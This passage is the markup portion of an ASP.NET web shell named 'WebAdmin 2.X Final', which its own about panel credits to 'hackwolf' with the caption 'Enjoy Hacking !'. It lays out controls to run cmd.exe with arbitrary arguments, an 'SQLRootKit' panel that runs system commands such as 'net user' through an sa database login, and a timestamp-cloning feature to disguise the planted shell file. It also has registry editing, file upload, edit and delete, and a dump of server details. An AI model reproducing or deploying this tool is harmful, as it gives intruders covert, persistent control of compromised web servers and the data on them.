  849. <asp:Button class="buttom" id="Button_NewF" onclick="NewFile" runat="server" Text="NewFile"></asp:Button>
  850. <asp:Button class="buttom" id="Button_NewD" onclick="NewFolder" runat="server" Text="NewDir"></asp:Button>
  851. <input class="TextBox" id="UpFile" type="file" name="upfile" runat="server" />
  852. <asp:Button class="buttom" id="Button_UpFile" onclick="UpLoad" runat="server" Text="UpLoad" EnableViewState="False"></asp:Button>
  853. <HT>
  854. <br />
  855. <asp:Label id="Label_files" runat="server" enableviewstate="False" font-size="XX-Small" width="800px"></asp:Label>
  856. </asp:Panel>
  857. <asp:Panel id="CMD" runat="server" Wrap="False" ToolTip="CMD" Visible="False" Width="380px">
  858. <asp:Label id="Label_cmdpath" runat="server" enableviewstate="False" width="100px">Program
  859. : </asp:Label>
  860. <asp:TextBox class="TextBox" id="CMDPath" runat="server" Wrap="False" Text="cmd.exe" Width="250px">c:\windows\system32\cmd.exe</asp:TextBox>
  861. <br />
  862. <asp:Label id="Label_cmd" runat="server" enableviewstate="False" width="100px">Arguments
  863. :</asp:Label>
  864. <asp:TextBox class="TextBox" id="CMDCommand" runat="server" Wrap="False" Width="250px">/c ver</asp:TextBox>
  865. <asp:Button class="buttom" id="Button_cmdRun" onclick="RunCMD" runat="server" Text="Run" EnableViewState="False"></asp:Button>
  866. <br />
  867. <asp:Label id="cmdResult" runat="server"></asp:Label>
  868. </asp:Panel>
  869. <asp:Panel id="CloneTime" runat="server" Wrap="False" ToolTip="Clone Time" Visible="False">
  870. <asp:Label id="Label_rework" runat="server">Rework File or Dir:</asp:Label>
  871. <asp:TextBox class="TextBox" id="time1" runat="server" Wrap="False" Width="400px">c:\webadmin2XF.aspx</asp:TextBox>
  872. <br />
  873. <asp:Label id="Label_copied" runat="server">Copied File or Dir : </asp:Label>
  874. <asp:TextBox class="TextBox" id="time2" runat="server" Wrap="False" Width="400px">c:\index.aspx</asp:TextBox>
  875. <br />
  876. <asp:Button class="buttom" id="Button_clone" onclick="GoCloneTime" runat="server" Text="Clone"></asp:Button>
  877. <br />
  878. <asp:Label id="Label_cloneResult" runat="server"></asp:Label>
  879. </asp:Panel>
  880. <asp:Panel id="SQLRootkit" runat="server" Wrap="False" ToolTip="SQLRootKit" Visible="False">
  881. <asp:Label id="Label_conn" runat="server" width="100px">ConnString:</asp:Label>
  882. <asp:TextBox class="TextBox" id="ConStr" runat="server" Wrap="False" Width="500px">server=;UID=sa;PWD=;Provider=SQLOLEDB</asp:TextBox>
  883. <br />
  884. <asp:Label id="Label_sqlcmd" runat="server" width="100px">Command:</asp:Label>
  885. <asp:TextBox class="TextBox" id="SQLCmd" runat="server" Wrap="False" Width="500px">net user</asp:TextBox>
  886. <asp:Button class="buttom" id="SQLCmdRun" onclick="CMDSHELL" runat="server" Text="Run"></asp:Button>
  887. <br />
  888. <asp:Label id="resultSQL" runat="server"></asp:Label>
  889. </asp:Panel>
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  891. <table width="80%" align="center" border="1">
  892. <tbody>
  893. <tr>
  894. <td colspan="2">
  895. Web Server Information</td>
  896. </tr>
  897. <tr>
  898. <td width="40%">
  899. Server IP</td>
  900. <td width="60%">
  901. <asp:Label id="ServerIP" runat="server" enableviewstate="False"></asp:Label></td>
  902. </tr>
  903. <tr>
  904. <td height="73">
  905. Machine Name</td>
  906. <td>
  907. <asp:Label id="MachineName" runat="server" enableviewstate="False"></asp:Label></td>
  908. </tr>
  909. <tr>
  910. <td>
  911. Network Name</td>
  912. <td>
  913. <asp:Label id="UserDomainName" runat="server"></asp:Label></td>
  914. </tr>
  915. <tr>
  916. <td>
  917. User Name in this Process</td>
  918. <td>
  919. <asp:Label id="UserName" runat="server"></asp:Label></td>
  920. </tr>
  921. <tr>
  922. <td>
  923. OS Version</td>
  924. <td>
  925. <asp:Label id="OS" runat="server"></asp:Label></td>
  926. </tr>
  927. <tr>
  928. <td>
  929. Started Time</td>
  930. <td>
  931. <asp:Label id="StartTime" runat="server"></asp:Label></td>
  932. </tr>
  933. <tr>
  934. <td>
  935. System Time</td>
  936. <td>
  937. <asp:Label id="NowTime" runat="server"></asp:Label></td>
  938. </tr>
  939. <tr>
  940. <td>
  941. IIS Version</td>
  942. <td>
  943. <asp:Label id="IISV" runat="server"></asp:Label></td>
  944. </tr>
  945. <tr>
  946. <td>
  947. HTTPS</td>
  948. <td>
  949. <asp:Label id="HTTPS" runat="server"></asp:Label></td>
  950. </tr>
  951. <tr>
  952. <td>
  953. PATH_INFO</td>
  954. <td>
  955. <asp:Label id="PATHS" runat="server"></asp:Label></td>
  956. </tr>
  957. <tr>
  958. <td>
  960. <td>
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  962. </tr>
  963. <tr>
  964. <td>
  965. SERVER_PORT</td>
  966. <td>
  967. <asp:Label id="PORT" runat="server"></asp:Label></td>
  968. </tr>
  969. <tr>
  970. <td>
  971. SeesionID</td>
  972. <td>
  973. <asp:Label id="SID" runat="server"></asp:Label></td>
  974. </tr>
  975. </tbody>
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  980. <asp:TextBox class="TextBox" id="DataCStr" runat="server" Wrap="False" Width="500px">Provider=Microsoft.Jet.OLEDB.4.0;Data Source=E:\MyWeb\UpdateWebadmin\guestbook.mdb</asp:TextBox>
  981. <br />
  982. <asp:Label id="Label_datatype" runat="server" width="120px">Database Type:</asp:Label>
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  986. <br />
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  988. <br />
  989. <asp:Label id="DB_exe" runat="server" height="37px" visible="False">Execute SQL :</asp:Label>
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  992. <br />
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  994. <br />
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  1000. <asp:Label id="label_rkey" runat="server" width="80px">Key :</asp:Label>
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  1002. <br />
  1003. <asp:Label id="label_rV" runat="server" width="80px">Value:</asp:Label>
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  1006. <br />
  1007. <br />
  1008. <asp:Label id="RegResult" runat="server"></asp:Label>
  1009. </asp:Panel>
  1010. <asp:Panel id="about" runat="server" Wrap="False" ToolTip="about WebAdmin 2.X Final" Visible="False" Width="789px" Height="25px" HorizontalAlign="Center">
  1011. <br />
  1012. <br />
  1013. <asp:Label id="label_about" runat="server" width="80px">WebAdmin 2.X Final is a webshell
  1014. run in ASP.Net code by&nbsp;</asp:Label>
  1015. <asp:HyperLink id="HyperLink1" runat="server" Visible="True" Target="_blank" NavigateUrl="http://canglangjidi.qyun.net">hackwolf</asp:HyperLink>
  1016. <br />
  1017. <asp:Image id="Image1" runat="server" ToolTip="Build20051225" Visible="True" ImageUrl="http://j.thec.cn/canglangjidi/cljd.jpg" AlternateText="Enjoy Hacking !"></asp:Image>
  1018. </asp:Panel>
  1019. <asp:Panel id="File_Edit" runat="server" Wrap="False" ToolTip="Edit File" Visible="False" Width="789px" Height="25px" HorizontalAlign="Center">
  1020. <asp:Label id="label_path" runat="server">File Path : </asp:Label>
  1021. <asp:TextBox id="edited_path" runat="server" Width="300" CssClass="TextBox"></asp:TextBox>
  1022. *
  1023. <br />
  1024. <asp:TextBox id="edited_content" runat="server" TextMode="MultiLine" CssClass="TextBox" Columns="100" Rows="25"></asp:TextBox>
  1025. <br />
  1026. <asp:Button id="edited_Edit" onclick="FileEdit" runat="server" Text="Sumbit" CssClass="buttom"></asp:Button>
  1027. </asp:Panel>
  1028. <asp:Panel id="File_del" runat="server" Wrap="False" ToolTip="Delete File" Visible="False" Width="789px" Height="25px" HorizontalAlign="Center">
  1029. <asp:Label id="label_del" runat="server"></asp:Label>
  1030. <br />
  1031. <asp:Button id="del_del" onclick="FileDel" runat="server" Text="Delete It" CssClass="buttom"></asp:Button>
  1032. </asp:Panel>
  1033. <asp:Panel id="File_Rename" runat="server" Wrap="False" ToolTip="Delete File" Visible="False" Width="789px" Height="25px" HorizontalAlign="Center">
  1034. <asp:TextBox class="TextBox" id="btn_rename" runat="server" Wrap="False" Width="200px"></asp:TextBox>
  1035. <asp:Button id="rn_rn" onclick="rn_rn_Click" runat="server" Text="Rename It" CssClass="buttom"></asp:Button>
  1036. </asp:Panel>
  1037. <asp:Panel id="File_Att" runat="server" Wrap="False" Visible="False" Width="789px" Height="25px" HorizontalAlign="Center">
  1038. <asp:CheckBox class="TextBox" id="onlyread" Wrap="false" Text="ReadOnly" Width="100px" Runat="server"></asp:CheckBox>
  1039. <asp:CheckBox class="TextBox" id="hide" Wrap="false" Text="hide" Width="100px" Runat="server"></asp:CheckBox>
  1040. <asp:CheckBox class="TextBox" id="sys" Wrap="false" Text="sys" Width="100px" Runat="server"></asp:CheckBox>
  1041. <asp:CheckBox class="TextBox" id="archive" Wrap="false" Text="archive" Width="100px" Runat="server"></asp:CheckBox>
  1042. <br />
  1043. <asp:Button id="Set_Att" onclick="Set_Att_Click" runat="server" Text="Set It" CssClass="buttom"></asp:Button>
  1044. </asp:Panel>
  1045. </form>
  1046. </body>
  1047. </html>
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